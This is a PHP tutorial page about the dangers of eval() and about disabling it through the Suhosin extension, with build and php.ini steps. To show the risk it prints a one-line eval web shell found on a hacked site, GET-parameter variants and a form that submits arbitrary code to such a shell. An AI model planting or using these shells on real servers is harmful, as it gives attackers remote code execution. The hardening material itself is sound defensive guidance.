How to ban eval with security risks in php-PHP Problem-php.cn

Home

Backend Development

PHP Problem

How to ban eval with security risks in php

醉折花枝作酒筹

Jul 21, 2021 pm 04:05 PM

evalphp

Before the website was attacked by hackers, we learned that the eval function of PHP has great security risks. Today we will introduce the method of disabling eval. You can refer to it if necessary.

How to ban eval with security risks in php

Some time ago, the website was invaded by hackers. Later, during the investigation, a php was found with very little content:

<?php eval($_POST[asda123131323156341]);?>

Then I searched the eval function of PHP online and found that this eval function has great security risks.

Test it locally, write a php in the local environment, the content is as follows:

default.php:

<?php eval($_GET[asda]);?>

Then visit: localhost/test/default.php?asda =phpinfo();

You can see that phpinfo has been executed.

Or visit localhost/test/default.php?asda = echo 11111; you will also find that 1111 is echoed out.

Similar methods include:

<?php $code="${${eval($_GET[c])}}";?>

Visit localhost/test/default.php?c=phpinfo(); and you will see

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

Visit localhost/test/ default.php?c= ${${phpinfo()}}; you can see

Use the eval function that can execute php. Hackers can use this to upload some background Trojans, such as uploading php, and then Access this php via url to gain greater permissions. This type of intrusion is called a one-sentence Trojan. For example: write an html with the following content:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

Then write a default.php with the content: >

<?php eval($_POST[c]);?>

In this case, you can directly submit whatever php you want to execute. Just run it.

So: eval() has great destructive power for PHP security. The eval function weakens the security of your application. Therefore, it is generally not used in order to prevent Trojan horse intrusion similar to the following sentence. Need to be banned!

However, many methods on the Internet that use disable_functions to disable eval are wrong!

In fact, eval() cannot be disabled using disable_functions in php.ini:

because eval() is a language construct and not a function

eval is zend , so it is not a PHP_FUNCTION function;

So how does PHP prohibit eval?

If you want to disable eval, you can use the php extension Suhosin:

After installing Suhosin, load Suhosin.so in php.ini, and add suhosin.executor.disable_eval = on. !

Summary, php's eval function cannot be disabled in php, so we can only use plug-ins!

As for the steps to install suhosin to disable the eval function: (not tested)

Instructions:

php installation directory:/usr/local/php5

php.ini configuration file path:/usr/local/php5/etc/php.ini

Nginx installation directory:/usr/local/nginx

Nginx website root directory:/usr/ local/nginx/html

1. Install the compilation tool

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2. Install suhosin

cd /usr/local/src   #进入软件包存放目录
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下载
tar zxvf suhosin-0.9.33.tgz   #解压
cd suhosin-0.9.33   #进入安装目录
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #编译
make install   #安装
安装完成之后，出现下面的界面，记住以下路径，后面会用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模块路径

3. Configure php to support suhosin

vi /usr/local/php5/etc/php.ini  
 #编辑配置文件，在最后一行添加以下内容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

Note: suhosin The function of .executor.disable_eval = on is to disable the eval function

4, test

vi /usr/local/nginx/html/phpinfo.php #Edit

<?php
phpinfo();
?>

: wq! #Save and exit

service php-fpm restart #Restartphp-fpm

service nginx restart #Restart nginx

Note: If it is apache, it is the same, just restart apache.

Open phpinfo.php in your browser, as shown in the figure below, you can see suhosin related information

At this point, the suhosin installation of PHP under Linux is completed!

Note: What will be the consequences after disabling eval? First of all, software that uses eval in the code will not be able to use it, such as the famous Discuz! Forum and PHPWind Forum will not be able to be used normally, and it will also affect the old version of phpMyAdmin. If it is updated to the latest 3.2.5, it can be used, but it is available by default. For a warning prompt, add $cfg['SuhosinDisableWarning']=true;

to config.inc.php to cancel this warning.

Note: In addition to eval, assert is also used similarly.

Recommended learning: php video tutorial

The above is the detailed content of How to ban eval with security risks in php. For more information, please follow other related articles on the PHP Chinese website!

Statement

This article is reproduced at:CSDN. If there is any infringement, please contact admin@php.cn delete

ACID vs BASE Database: Differences and when to use each.Mar 26, 2025 pm 04:19 PM

The article compares ACID and BASE database models, detailing their characteristics and appropriate use cases. ACID prioritizes data integrity and consistency, suitable for financial and e-commerce applications, while BASE focuses on availability and

PHP Secure File Uploads: Preventing file-related vulnerabilities.Mar 26, 2025 pm 04:18 PM

The article discusses securing PHP file uploads to prevent vulnerabilities like code injection. It focuses on file type validation, secure storage, and error handling to enhance application security.

PHP Input Validation: Best practices.Mar 26, 2025 pm 04:17 PM

Article discusses best practices for PHP input validation to enhance security, focusing on techniques like using built-in functions, whitelist approach, and server-side validation.

PHP API Rate Limiting: Implementation strategies.Mar 26, 2025 pm 04:16 PM

The article discusses strategies for implementing API rate limiting in PHP, including algorithms like Token Bucket and Leaky Bucket, and using libraries like symfony/rate-limiter. It also covers monitoring, dynamically adjusting rate limits, and hand

PHP Password Hashing: password_hash and password_verify.Mar 26, 2025 pm 04:15 PM

The article discusses the benefits of using password_hash and password_verify in PHP for securing passwords. The main argument is that these functions enhance password protection through automatic salt generation, strong hashing algorithms, and secur

OWASP Top 10 PHP: Describe and mitigate common vulnerabilities.Mar 26, 2025 pm 04:13 PM

The article discusses OWASP Top 10 vulnerabilities in PHP and mitigation strategies. Key issues include injection, broken authentication, and XSS, with recommended tools for monitoring and securing PHP applications.

PHP XSS Prevention: How to protect against XSS.Mar 26, 2025 pm 04:12 PM

The article discusses strategies to prevent XSS attacks in PHP, focusing on input sanitization, output encoding, and using security-enhancing libraries and frameworks.

PHP Interface vs Abstract Class: When to use each.Mar 26, 2025 pm 04:11 PM

The article discusses the use of interfaces and abstract classes in PHP, focusing on when to use each. Interfaces define a contract without implementation, suitable for unrelated classes and multiple inheritance. Abstract classes provide common funct

See all articles